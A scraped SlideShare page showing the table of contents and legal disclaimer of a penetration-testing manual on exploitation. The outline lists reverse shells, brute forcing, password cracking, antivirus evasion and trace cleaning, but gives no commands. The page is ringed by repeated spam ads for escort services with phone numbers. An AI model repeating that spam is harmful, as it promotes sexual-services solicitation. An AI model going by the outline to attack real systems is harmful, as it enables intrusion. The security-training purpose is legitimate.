Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts serviceChennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts servicesonalikaur4
ย 

Recently uploaded (20)

Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Call
ย 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
ย 
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
ย 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
ย 
VIP Call Girls Kolkata Ananya ๐ŸคŒ 8250192130 ๐Ÿš€ Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya ๐ŸคŒ  8250192130 ๐Ÿš€ Vip Call Girls KolkataVIP Call Girls Kolkata Ananya ๐ŸคŒ  8250192130 ๐Ÿš€ Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya ๐ŸคŒ 8250192130 ๐Ÿš€ Vip Call Girls Kolkata
ย 
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts serviceChennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
ย 
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
ย 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
ย 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
ย 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ย 
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
ย 
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130 Available With Room
ย 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 ๐Ÿซฆ Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 ๐Ÿซฆ Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 ๐Ÿซฆ Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 ๐Ÿซฆ Vanshika Verma More Our Se...
ย 
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...
ย 
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130  Available With RoomVIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130  Available With Room
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130 Available With Room
ย 
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
ย 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
ย 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural  in villages of indiaGram Darshan PPT cyber rural  in villages of india
Gram Darshan PPT cyber rural in villages of india
ย 
Model Call Girl in Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”
Model Call Girl in  Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”Model Call Girl in  Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”
Model Call Girl in Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”
ย 
Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts serviceChennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Porur Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
ย 

Penetration Test Black Box type - exploitation phase

  • 1. TCP/IP Penetration Test - Exploitation Page 1 / 184 Linkedin: https://www.linkedin.com/in/luigi-capuzzello/ Slideshare: http://www.slideshare.net/luigicapuzzello Twitter: @FisherKasparov Skype: luigi.capuzzello Summary: TCP/IP Penetration Test - Exploitation Description of the last modification: Insert description of the last modification here Issued by: Date LUIGI CAPUZZELLO 10/05/2022 TCP/IP Penetration Test - Exploitation
4.4. FIRST ACCESS TO KALI ........ 16
5. MANAGING KALI LINUX SERVICES ........ 18
5.1. SSH SERVICE ........ 18
    How to activate SSH Server ........ 18
    Useful commands ........ 19
5.2. HTTP SERVICE ........ 20
5.3. FTP SERVICE ........ 20
5.4. TFTPD SERVICE ........ 21
5.5. SAMBA SERVICE ........ 21
5.6. VNC SERVICE ........ 22
6. BASH: USEFUL COMMANDS ........ 22
6.1. USEFUL COMMAND LIST ........ 22
6.2. GREP - AWK - SED ........ 25
6.3. COMM: FILE COMPARISON ........ 26
7. INFORMATION GATHERING ........ 26
7.1. INTERNAL NETWORK SCAN ........ 27
7.2. TARGET INFO ........ 27
7.3. OSINT ........ 28
7.4. DNS: DEFINE ATTACK SURFACE ........ 28
7.5. INFORMATION GATHERING FROM WEB: SHODAN - CENSYS ........ 30
7.6. MALTEGO ........ 30
7.7. FACEBOOK ........ 30
8. SERVICE INFORMATION GATHERING ........ 32
8.1. NMAP ........ 32
9. EXPLOITATION ........ 34
9.1. EXPLOITATION WITH AUTOMATED TOOLS ........ 34
    nmap ........ 34
    Sites ........ 35
    Nessus ........ 35
    openVAS ........ 36
    Metasploit ........ 38
    Searchsploit / Metasploit: known vulnerabilities ........ 39
    Metasploit: checking non-working exploits ........ 39
    Meterpreter ........ 39
    Armitage: Metasploit Interface ........ 41
    Nessus and Metasploit ........ 44
    How to compile an exploit manually ........ 45
9.2. [21] - FTP ........ 46
    Service Fingerprint ........ 46
    AuthN bypass: Anonymous Access ........ 46
    AuthN bypass: Bruteforce ........ 46
    Information Exposure ........ 46
    Reverse Shell Activation ........ 47
    DOS ........ 47
9.4. [22, 80, 445] - GIT ........ 48
    AuthN bypass: Known Vuln ........ 48
    Information Exposure ........ 48
9.5. [22] - SSH ........ 50
    Service Fingerprint ........ 50
    AuthN bypass: Connect using a found key ........ 50
    AuthN bypass: Bruteforce ........ 50
    AuthN bypass: Known Vuln ........ 50
9.6. [22, 80, 443, 3690] - SVN ........ 52
    AuthN bypass: Known Vuln ........ 52
9.7. [23] - TELNET ........ 52
    AuthN bypass: Bruteforce ........ 52
9.8. [25] - SMTP ........ 52
    Service Fingerprint ........ 52
    AuthN bypass: Bruteforce ........ 52
    Information Exposure ........ 53
    Reverse Shell Activation ........ 53
9.9. [50, 51, 500(UDP)] - IPSEC AND VPN ........ 54
    AuthN bypass: Bruteforce ........ 54
9.10. [53] - DNS ........ 55
    Service Fingerprint ........ 55
    Information Exposure ........ 55
9.11. [69] - TFTP ........ 55
    Service Fingerprint ........ 55
9.12. [79] - FINGER ........ 56
    Information Exposure ........ 56
9.13. [80] - HTTP ........ 56
9.14. [88] - KERBEROS ........ 57
    Information Exposure ........ 57
9.15. [110] - POP3 ........ 57
9.16. [111, 2049] - NFS / RPC ........ 58
    Information Exposure ........ 58
9.17. [123] - NTP ........ 59
    Information Exposure ........ 59
9.18. [143 / 993]: IMAP ........ 59
    Information Exposure ........ 59
9.19. [161] - SNMP ........ 60
    Service Fingerprint ........ 60
    AuthN bypass: Bruteforce ........ 60
    Information Exposure ........ 60
9.20. [389] AD ........ 61
    Information Exposure ........ 61
9.21. [389] LDAP ........ 62
    Information Exposure ........ 63
9.22. [443] - HTTPS ........ 65
9.23. [443, 8443] - OPENVPN ........ 66
    AuthN bypass: Bruteforce ........ 66
9.24. [445] - SMB ........ 67
    Service Fingerprint ........ 67
    AuthN bypass: Bruteforce ........ 67
    Information Exposure ........ 67
    Reverse Shell Activation ........ 75
9.25. [1433] - MSSQL ........ 78
    Service Fingerprint ........ 78
    AuthN bypass: Bruteforce ........ 78
    Information Exposure ........ 78
    Reverse Shell Activation ........ 79
9.26. [1521] - ORACLE ........ 80
    Information Exposure: msfconsole ........ 80
    Information Exposure: ODAT ........ 80
    Reverse Shell Activation ........ 83
9.27. [3128] - SQUID ........ 87
    Reverse Shell Activation ........ 87
9.28. [3260] - ISCSI ........ 88
    Information Exposure ........ 88
9.29. [3306] - MYSQL / MARIADB ........ 89
    Service Fingerprint ........ 89
    AuthN bypass: Anonymous Access ........ 89
    AuthN bypass: Bruteforce ........ 89
    Information Exposure ........ 89
    Reverse Shell Activation: with searchsploit ........ 90
    Reverse Shell Activation: with UDF exploitation ........ 90
9.30. [3389] - RDP ........ 92
    Service Fingerprint ........ 92
    AuthN bypass: Bruteforce ........ 92
9.31. [5900] - VNC ........ 93
    Service Fingerprint ........ 93
    AuthN bypass: Bruteforce ........ 93
9.32. [5985] - WINRM ........ 93
    Reverse Shell Activation ........ 93
9.33. [6379]: REDIS ........ 94
    Information Exposure ........ 94
    Reverse Shell Activation ........ 94
    Post-Exploitation: write file (SSH / HTTP / CRONTAB) ........ 95
9.34. [8000] JDWP: JAVA DEBUGGING PORT ........ 97
    Reverse Shell Activation ........ 97
9.35. [8000] - AJENTI ........ 97
    Reverse Shell Activation ........ 97
9.36. [8080] TOMCAT ........ 98
    Reverse Shell Activation ........ 98
    AuthN bypass ........ 98
    Reverse Shell Activation ........ 98
9.37. [9200] - ELASTICSEARCH ........ 99
    Service Fingerprint ........ 99
    Information Exposure ........ 99
9.39. [10000] - WEBMIN ........ 101
    Reverse Shell Activation: with meterpreter (credentials may be required) ........ 101
    Reverse Shell Activation: manually (without credentials) ........ 102
9.40. [11211] - MEMCACHED ........ 102
    Information Exposure ........ 102
9.41. [27017] - MONGODB ........ 104
    Service Fingerprint ........ 104
    AuthN bypass: Bruteforce ........ 104
    Information Exposure ........ 104
10. MODULE: CREATE A REVERSE SHELL ........ 106
10.1. ![WINDOWS] BY MEANS OF SETOOLKIT ........ 106
10.2. MANUALLY ........ 107
    [windows]: reverse shell ........ 107
    [windows]: reverse shell ........ 108
    [windows]: execute command ........ 109
10.3. BY MEANS OF TOOLS: NETCAT, SOCAT, NCAT ........ 109
    [Windows-Linux] Netcat ........ 109
    socat ........ 110
    Ncat ........ 110
10.4. BY MEANS OF MSFVENOM: EXE, ELF, PHP, ASP, JSP, WAR ........ 110
    [Windows]: reverse shell / bind shell / execute command / embedded execution ........ 110
    [Windows] Reverse shell nishang ........ 111
    [Linux]: reverse shell / bind shell ........ 111
    [Linux] PHP: reverse shell ........ 112
    [Windows] ASP/ASPX: reverse shell ........ 112
    WAR: reverse shell ........ 112
    JSP: reverse shell ........ 112
10.5. BY MEANS OF SCRIPTING LANGUAGES: BASH, PERL, PYTHON, PHP, POWERSHELL ........ 112
    [Linux] bash ........ 113
    [Linux] Perl ........ 113
    [Linux] python ........ 113
    [Linux] PHP ........ 113
    [Windows] Powershell ........ 113
10.7. AV EVASION ........ 114
    ![windows] msfvenom -> double encoding ........ 114
    manually ........ 117
    by means of Shellter ........ 119
    by means of mimikatz ........ 120
11. MODULE SCRIPTING: USEFUL SCRIPTS ........ 127
11.1. JAVASCRIPT: IMPLEMENT POST ........ 127
11.2. LUA: READ / WRITE FILE ........ 127
11.3. LUA: EXECUTE COMMAND ........ 128
11.4. PYTHON: BRUTEFORCE SOCKET TCP/UDP READING DATA FROM A FILE ........ 128
11.5. PYTHON: BRUTEFORCE SOCKET ........ 129
11.6. PYTHON: READ DATA FROM MYSQL ........ 129
11.7. PYTHON: TAKE DATA FROM A WEB PAGE, PROCESS IT AND SEND THE RESULT VIA POST ........ 130
11.8. PYTHON: BRUTEFORCE WITH AN ANTI-CSRF TOKEN ........ 131
11.9. PYTHON: BRUTEFORCE SMTP ........ 132
11.10. PYTHON: CRACK ENCRYPTED INFO KNOWING THE ALGORITHM, WITH BRUTE FORCE ........ 134
11.11. PYTHON: CRACK ENCRYPTED INFO KNOWING THE ALGORITHM, WITH A DICTIONARY ........ 134
11.12. PYTHON: LFI ........ 135
11.13. PHP: CRACK SALTED HASH PASSWORD ........ 136
12. MODULE: BRUTE FORCE ........ 137
13. MODULE: PASSWORD CRACKING ........ 137
13.1. TOOLS ........ 137
    hashcat ........ 137
    John The Ripper ........ 137
    hydra ........ 138
  • 6. TCP/IP Penetration Test Page 6 / 184 Linkedin: https://www.linkedin.com/in/luigi-capuzzello/ Slideshare: http://www.slideshare.net/luigicapuzzello Twitter: @FisherKasparov Skype: luigi.capuzzello 13.2. DICTIONARY.........................................................................................................................................................139 Ready to use ................................................................................................................................................139 Ready to use with HASH ..............................................................................................................................139 create one with john....................................................................................................................................139 create one manually....................................................................................................................................140 13.3. CRACK PASSWORD ON-LINE.......................................................................................................................................141 online Site....................................................................................................................................................141 13.4. 
CRACK PASSWORD OFF-LINE......................................................................................................................................141 Python: Crack Salted Hash Password ..........................................................................................................141 .htpasswd ....................................................................................................................................................142 Cisco Password Type 5, 7.............................................................................................................................142 Crack: Mozilla profile .default .....................................................................................................................143 Crack Groups.xml.........................................................................................................................................143 Hash Generici: John .....................................................................................................................................143 Hash Generici: rcrack...................................................................................................................................145 Hash Generici: RAINBOW TABLE .................................................................................................................145 Hash Generici: ophcrack..............................................................................................................................145 Crack Linux password ................................................................................................................................146 Crack: LUKS file..........................................................................................................................................146 JWT firma: 
hashcat....................................................................................................................................147 .KIRBI (Kerberos Token) .............................................................................................................................147 MD5: hashcat ............................................................................................................................................148 PKI: private key with password .................................................................................................................148 VNC............................................................................................................................................................149 Windows Password Hash Cracking............................................................................................................153 Windows Password: john ..........................................................................................................................162 Windows: .dit e .bin...................................................................................................................................163 WPA/WPA2: hashcat.................................................................................................................................164 WPA/WPA2: pyrit......................................................................................................................................164 WPA/WPA2: aircrack / john ......................................................................................................................165 ZIP..............................................................................................................................................................166 14. 
IPV6 .....................................................................................................................................................................166 14.1. NOTATIONS.............................................................................................................................................................166 14.2. TYPES OF ADDRESSING ..............................................................................................................................................166 14.3. SPECIAL ADDESSING..................................................................................................................................................169 14.4. IPV6: ATTACK MANUALLY..........................................................................................................................................169 80: http....................................................................................................................................................................170 14.5. IPV6: ATTACK WITH ALIVE6 .......................................................................................................................................170 14.6. LOOKING AROUND ...................................................................................................................................................171 14.7. SETTING A GLOBAL ADDRESS ......................................................................................................................................171 14.8. IPV6 AND METASPLOIT .............................................................................................................................................172 14.9. SETTINGS AN IPV6 TUNNEL........................................................................................................................................175 15. APPENDIX: BECOME SILENT. 
................................................................................................................................177 15.1. IPTABLES.................................................................................................................................................................177 15.2. TORTUNNEL - PROXYCHAINS........................................................................................................................................177 15.3. PROXYCHAIN...........................................................................................................................................................178 15.4. TOR......................................................................................................................................................................178 16. APPENDIX: CLEAN TRACES. ..................................................................................................................................180 17. APPENDIX: BASH SCRIPTING ................................................................................................................................180 17.1. VARIABLE................................................................................................................................................................180 17.2. FUNCTION ARGOMENT ..............................................................................................................................................180
  • 7. TCP/IP Penetration Test Page 7 / 184 Linkedin: https://www.linkedin.com/in/luigi-capuzzello/ Slideshare: http://www.slideshare.net/luigicapuzzello Twitter: @FisherKasparov Skype: luigi.capuzzello 17.3. READ USER INPUT.....................................................................................................................................................180 17.4. IF / ELSE STATEMENT...............................................................................................................................................181 17.5. CICLO FOR .............................................................................................................................................................181 17.6. CICLO WHILE..........................................................................................................................................................182 17.7. FUNCTION ...........................................................................................................................................................182 18. APPENDIX: DOCKER .............................................................................................................................................183
1. LEGAL DISCLAIMER

Usage of this document for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this document.